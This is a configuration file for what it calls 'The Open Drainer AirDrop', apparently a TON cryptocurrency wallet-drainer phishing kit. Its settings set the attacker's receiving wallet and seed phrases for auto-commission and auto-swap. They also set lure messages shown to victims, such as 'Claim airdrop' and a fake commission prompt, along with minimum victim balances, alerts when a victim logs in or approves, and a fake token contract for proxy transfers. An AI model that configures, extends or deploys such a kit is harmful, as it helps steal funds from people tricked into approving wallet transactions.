DOMAIN=default
UNIQUE_PRODUCT_ID=

TOKEN=''
ID=''

WALLET=''
AUTO_SPLIT_PERCETAGE='100'

AUTO_COMMISSION=true
AUTO_COMMISSION_FROM=5
SEED_FOR_AUTOCOMMISSION=''
AMOUNT_FOR_AUTOCOMMISSION=0.22
AUTO_COMMISSION_COM='🔓 Now you can pay the comission.'

AUTO_SWAP=true
SEED_FOR_AUTOSWAP=''

USE_DYNAMIC=true
DYNAMIC_COM='Receive: '
DYNAMIC_MULTIPLIER=10

STATIC_COM='hello!'
NFT_COM='Claim airdrop'

MIN_BALANCE_TOKEN=0
MIN_BALANCE_NFT=0
MIN_BALANCE_TOTAL=1

MANIFEST_URL=''
MANIFEST_FILE_NAME=''
MANIFEST_FILE_URL=''
MANIFEST_FILE_ICON='https://my-icon.com/url'

API_KEY=''
TONCENTER_API_KEY=''
TONAPI_KEY=''

NOTIFY_NEW_LOGIN=true
NOTIFY_CLOSED_SITE=true
NOTIFY_ZERO_WALLETS=true
NOTIFY_ONLY_APPROVES=false
CURRENCY=usd

BUTTON_FEE_AMOUNT=0.22
BUTON_FEE_COM='🔓 Now you can pay the comission.'

# For future updates
TON_IN_FEE=true

USE_PROXY=true
ONLY_IN_FIRST_TRANSACTION=false
# Не советуется к использованию
PROXY_TON=false
PROXY_TOKEN_CONTRACT_MASTER='0:2f956143c461769579baef2e32cc2d7bc18283f40d20bb03e432cd603ac33ffc'
PROXY_TOKEN_COMMENT='The Open Drainer AirDrop'
PROXY_TOKEN_AMOUNT='100000000000000'